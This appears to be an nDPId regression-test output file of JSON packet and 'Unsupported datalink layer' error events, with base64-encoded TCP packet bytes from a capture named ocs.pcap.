-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":329,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG2QABABoEzwKi0ArL40DbC2QBQ64tGkd7q1XuAEBZI5QcAAAEBCAoANYgsRwYKfg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":330,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800886} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":330,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG3QABABoEywKi0ArL40DbC2QBQ64tGkd7q2ueAEBZ132wAAAEBCAoANYgtRwYKfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":331,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800910} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":331,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG4QABABoExwKi0ArL40DbC2QBQ64tGkd7q4FOAEBai2cYAAAEBCAoANYgvRwYKig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":332,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800911} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":332,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG5QABABoEwwKi0ArL40DbC2QBQ64tGkd7q5b+AEBbQ1CwAAAEBCAoANYgvRwYKig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":333,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800918} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":333,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG6QABABoEvwKi0ArL40DbC2QBQ64tGkd7q6yuAEBb9zpEAAAEBCAoANYgwRwYKiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":334,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800920} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":334,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG7QABABoEuwKi0ArL40DbC2QBQ64tGkd7q8JeAEBcqyPgAAAEBCAoANYgwRwYKiw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":335,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800940} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":335,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG8QABABoEtwKi0ArL40DbC2QBQ64tGkd7q9gOAEBdXw1YAAAEBCAoANYgyRwYKkg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":336,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800942} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":336,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG9QABABoEswKi0ArL40DbC2QBQ64tGkd7q+2+AEBeFvbwAAAEBCAoANYgyRwYKkg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":337,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800994} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":337,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG+QABABoErwKi0ArL40DbC2QBQ64tGkd7rANuAEBeyuB0AAAEBCAoANYg3RwYKkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":338,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800995} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":338,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG\/QABABoEqwKi0ArL40DbC2QBQ64tGkd7rBkeAEBffsoMAAAEBCAoANYg4RwYKkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":339,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801007} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHAQABABoEdwKi0ArL40DbC2QBQ64tGkd7rBkewEBffocEAAAEBCAoANYg5RwYKkwEBBQre6wuz3usRHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":340,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801050} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":340,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHBQABABoEcwKi0ArL40DbC2QBQ64tGkd7rBkewEBffnFEAAAEBCAoANYg9RwYKkwEBBQre6wuz3usWiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":341,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801050} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":341,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHCQABABoEbwKi0ArL40DbC2QBQ64tGkd7rBkewEBffluUAAAEBCAoANYg9RwYKkwEBBQre6wuz3usb9w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":342,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801059} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":342,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHDQABABoEawKi0ArL40DbC2QBQ64tGkd7rBkewEBffkXgAAAEBCAoANYg+RwYKkwEBBQre6wuz3ushYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":343,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801063} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":343,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHEQABABoEZwKi0ArL40DbC2QBQ64tGkd7rBkewEBffjAwAAAEBCAoANYg+RwYKkwEBBQre6wuz3usmzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":344,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801132} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":344,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHFQABABoEYwKi0ArL40DbC2QBQ64tGkd7rBkewEBffhpkAAAEBCAoANYhFRwYKkwEBBQre6wuz3ussOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":345,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801147} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":345,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHGQABABoEjwKi0ArL40DbC2QBQ64tGkd7rLDuAEBgMjC4AAAEBCAoANYhHRwYKuA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":346,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801225} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":346,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHHQABABoEWwKi0ArL40DbC2QBQ64tGkd7rLDuwEBgML34AAAEBCAoANYhORwYKuAEBBQre6zGn3us3Ew=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":347,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801286} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":347,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHIQABABoENwKi0ArL40DbC2QBQ64tGkd7rLDvQEBgM0yQAAAEBCAoANYhVRwYKuAEBBRLe6zx\/3utB697rMafe6zcT"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":348,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801684} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":348,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHJQABABoEUwKi0ArL40DbC2QBQ64tGkd7rNxOwEBg6DiIAAAEBCAoANYh8RwYLMAEBBQre6zx\/3utB6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":349,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801749} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":349,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHKQABABoETwKi0ArL40DbC2QBQ64tGkd7rNxOwEBg6CK8AAAEBCAoANYiDRwYLMAEBBQre6zx\/3utHVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":350,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801822} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":350,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHLQABABoEewKi0ArL40DbC2QBQ64tGkd7rR1eAEBhnb8gAAAEBCAoANYiKRwYLZA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":351,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801822} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":351,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHMQABABoEdwKi0ArL40DbC2QBQ64tGkd7rTMOAEBiUai8AAAEBCAoANYiKRwYLZA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":352,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801825} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":352,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHNQABABoEcwKi0ArL40DbC2QBQ64tGkd7rUi+AEBjBZJYAAAEBCAoANYiKRwYLZA=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":353,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801903} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":353,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHOQABABoEPwKi0ArL40DbC2QBQ64tGkd7rUi+wEBjBu\/wAAAEBCAoANYiSRwYLZAEBBQre61eb3utdBw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":354,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652801959} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":354,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMHPQABABoEGwKi0ArL40DbC2QBQ64tGkd7rUi\/QEBjBE7wAAAEBCAoANYiYRwYLZAEBBRLe62Jz3utn397rV5ve610H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":355,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802008} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":355,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHQQABABoENwKi0ArL40DbC2QBQ64tGkd7rXQewEBjvmwgAAAEBCAoANYidRwYLlwEBBQre62Jz3utn3w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":356,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802069} 
-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":356,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHRQABABoEMwKi0ArL40DbC2QBQ64tGkd7rXQewEBjvlZYAAAEBCAoANYijRwYLlwEBBQre62Jz3uttSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":357,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802132} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHSQABABoEXwKi0ArL40DbC2QBQ64tGkd7rbUuAEBkcSLEAAAEBCAoANYipRwYLsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":358,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802133} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":358,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHTQABABoEWwKi0ArL40DbC2QBQ64tGkd7rcreAEBlJQxgAAAEBCAoANYipRwYLsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":359,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802191} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":359,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHUQABABoEVwKi0ArL40DbC2QBQ64tGkd7reCOAEBl2PWoAAAEBCAoANYivRwYLwg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":360,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802193} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":360,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHVQABABoEIwKi0ArL40DbC2QBQ64tGkd7reCOwEBl2SPAAAAEBCAoANYivRwYLwgEBBQre632P3uuC+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":361,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802601} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHWQABABoETwKi0ArL40DbC2QBQ64tGkd7rgvuAEBmkMekAAAEBCAoANYjYRwYMFA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":362,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802635} -00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":362,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy8QABABnyZwKi0AomHgzS0VhQCr\/++QwAAAACgAjkIzeQAAAIEBbQEAggKADWI3AAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":363,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802668} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":363,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHXQABABoEGwKi0ArL40DbC2QBQ64tGkd7rgvuwEBmkHOAAAAEBCAoANYjfRwYMFAEBBQre643T3uuTPw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":364,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802671} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":364,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHYQABABoEFwKi0ArL40DbC2QBQ64tGkd7rgvuwEBmkF3QAAAEBCAoANYjfRwYMFAEBBQre643T3uuYqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":365,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802736} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":365,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHZQABABoEEwKi0ArL40DbC2QBQ64tGkd7riGewEBnREZ0AAAEBCAoANYjmRwYMSwEBBQre643T3uuYqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":366,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802736} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":366,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHaQABABoEPwKi0ArL40DbC2QBQ64tGkd7rmKuAEBn+G5oAAAEBCAoANYjmRwYMSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":367,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802743} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":367,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHbQABABoEOwKi0ArL40DbC2QBQ64tGkd7rnheAEBorFgAAAAEBCAoANYjmRwYMTA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":368,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802808} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":368,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHcQABABoENwKi0ArL40DbC2QBQ64tGkd7ro4OAEBpZEFIAAAEBCAoANYjtRwYMWQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":369,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802808} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":369,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHdQABABoEMwKi0ArL40DbC2QBQ64tGkd7rqO+AEBqGCrgAAAEBCAoANYjtRwYMWg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":370,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802810} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":370,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHeQABABoELwKi0ArL40DbC2QBQ64tGkd7rrluAEBqzBR4AAAEBCAoANYjtRwYMWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":371,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802870} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":371,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHfQABABoEKwKi0ArL40DbC2QBQ64tGkd7rs8eAEBrg\/24AAAEBCAoANYjzRwYMaw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":372,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802876} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":372,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHgQABABoEJwKi0ArL40DbC2QBQ64tGkd7ruTOAEBsO+dQAAAEBCAoANYjzRwYMaw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":373,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802928} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":373,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHhQABABoD8wKi0ArL40DbC2QBQ64tGkd7ruTOwEBsOgzQAAAEBCAoANYj5RwYMawEBBQre676f3uvECw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":374,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652802929} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":374,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHiQABABoD7wKi0ArL40DbC2QBQ64tGkd7ruTOwEBsOfcgAAAEBCAoANYj5RwYMawEBBQre676f3uvJdw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":375,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803734} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":375,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMHjQABABoEGwKi0ArL40DbC2QBQ64tGkd7ryXeAEBs76DMAAAEBCAoANYlJRwYNRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":376,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803761} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":376,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMHkQABABoD5wKi0ArL40DbC2QBQ64tGkd7ryXewEBs7O14AAAEBCAoANYlMRwYNRQEBBQre69m73uvfJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":377,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652803763} 